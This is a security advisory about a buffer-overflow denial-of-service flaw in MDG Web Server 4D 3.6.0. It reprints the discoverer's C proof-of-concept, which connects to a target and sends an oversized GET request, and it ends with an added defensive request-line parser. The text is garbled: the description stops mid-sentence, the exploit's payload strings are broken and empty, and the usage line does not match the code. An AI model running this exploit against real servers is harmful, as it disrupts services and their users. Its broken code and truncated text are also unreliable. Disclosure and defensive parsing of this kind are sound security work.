Denial of Service (DoS) in MDG Web Server 4D Version 3.6.0
A Denial of Service (DoS) vulnerability in MDG Web Server 4D 3.6.0 can result in the execution of arbitrary code on the vulnerable system.
Ken Pfeil
May 6, 2003
Reported April 30, 2003, by Tom Ferris.
VERSIONS AFFECTED
MDG Web Server 4D 3.6.0
DESCRIPTION
A Denial of Service (DoS) vulnerability in MDG Web Server 4D 3.6.0 can result in the execution of arbitrary code on the vulnerable system. This vulnerability stems from a buffer-overflow condition. By issuing a GET / request with 4096 caret brackets (
DEMONSTRATION
The discoverer posted the following code as proof of concept:
/* Web Server 4D 3.6.0 DoS
*
* Vulnerable systems:
* Web Server 4D 3.6.0 DoS
* Vendor:
* http://www.mdg.com/
*
* Download it here:
* ftp://ftp.mdg.com/demos/WS4D/Win/WS4D_3.6.0_Full.exe
*
* Written and found by badpack3t
* For SP Research Labs
* 04/29/2003
*
* www.security-protocols.com
*
* usage:
* sp-ws4d [targetport] (default is 80)
*/
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")
char exploit[] =
"GET /
"
"
"
"
"
"
int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    char *target, buffer[30000];
    int port, bufsize;
    SOCKET mysocket;

    /* A target host argument is required */
    if (argc < 2)
    {
        printf("Web Server 4D 3.6.0 DoS\r\n");
        printf("Tool Usage:\r\n %s [targetport] (default is 80)\r\n", argv[0]);
        printf("www.security-protocols.com\r\n");
        exit(1);
    }

    /* Initialise Winsock; WSAStartup returns nonzero on failure */
    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData) != 0)
        exit(1);

    target = argv[1];
    //for default web attacks
    port = 80;
    if (argc >= 3) port = atoi(argv[2]);
    bufsize = 512;
    if (argc >= 4) bufsize = atoi(argv[3]);

    mysocket = socket(AF_INET, SOCK_STREAM, 0);
    if (mysocket == INVALID_SOCKET)
    {
        printf("Socket error!\r\n");
        exit(1);
    }

    printf("Resolving Hostnames...\r\n");
    if ((pTarget = gethostbyname(target)) == NULL)
    {
        printf("Resolve of %s failed\r\n", argv[1]);
        exit(1);
    }

    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    printf("Connecting...\r\n");
    if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
    {
        printf("Couldn't connect to host.\r\n");
        exit(1);
    }

    printf("Connected!...\r\n");
    printf("Sending Payload...\r\n");
    if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
    {
        printf("Error Sending the Exploit Payload\r\n");
        closesocket(mysocket);
        exit(1);
    }

    printf("Remote Webserver has been DoS'ed \r\n");
    closesocket(mysocket);
    WSACleanup();
    return 0;
}
VENDOR RESPONSE
MDG has released version 3.6.1 of the product. The vendor reports that this version is no longer vulnerable.
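The description attributes the crash to a buffer overflow triggered by an oversized GET request. The following is an added example, not code from the advisory, the discoverer or MDG: a request-line parser in C that bounds every copy and answers over-long input with 414 instead of overflowing. The 2048-byte line cap, the buffer sizes and all names are assumptions chosen for illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_REQUEST_LINE 2048 /* assumed cap, not a value from the advisory */

struct request_line {         /* pieces of "METHOD SP target SP version" */
    char method[16];
    char target[1024];
};

/* Copy n bytes into dst only if they fit together with a terminator. */
static int bounded_copy(char *dst, size_t dst_sz, const char *src, size_t n)
{
    if (n == 0 || n >= dst_sz)
        return -1;
    memcpy(dst, src, n);
    dst[n] = '\0';
    return 0;
}

/* Returns 200 accepted, 400 malformed, 414 too long. buf holds len bytes
 * read from the socket and need not be NUL-terminated. */
int parse_request_line(const char *buf, size_t len, struct request_line *out)
{
    size_t scan = len < MAX_REQUEST_LINE ? len : MAX_REQUEST_LINE;
    const char *eol = memchr(buf, '\n', scan);
    if (eol == NULL)          /* no line end inside the cap */
        return len >= MAX_REQUEST_LINE ? 414 : 400;
    const char *end = (eol > buf && eol[-1] == '\r') ? eol - 1 : eol;
    const char *sp1 = memchr(buf, ' ', (size_t)(end - buf));
    if (sp1 == NULL)
        return 400;
    const char *tgt = sp1 + 1;
    const char *sp2 = memchr(tgt, ' ', (size_t)(end - tgt));
    if (sp2 == NULL)
        return 400;
    if (bounded_copy(out->method, sizeof out->method, buf, (size_t)(sp1 - buf)))
        return 400;
    if (bounded_copy(out->target, sizeof out->target, tgt, (size_t)(sp2 - tgt)))
        return sp2 == tgt ? 400 : 414;
    return 200;
}

int main(void)
{
    const char ok[] = "GET /index.html HTTP/1.0\r\n"; /* constructed sample */
    struct request_line r;
    printf("%d %s\n", parse_request_line(ok, sizeof ok - 1, &r), r.target);
    return 0;
}
```

The length checks happen before any byte is copied, so a request target of any size is rejected with a status code rather than written past the end of a fixed buffer.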
CREDIT
Discovered by Tom Ferris.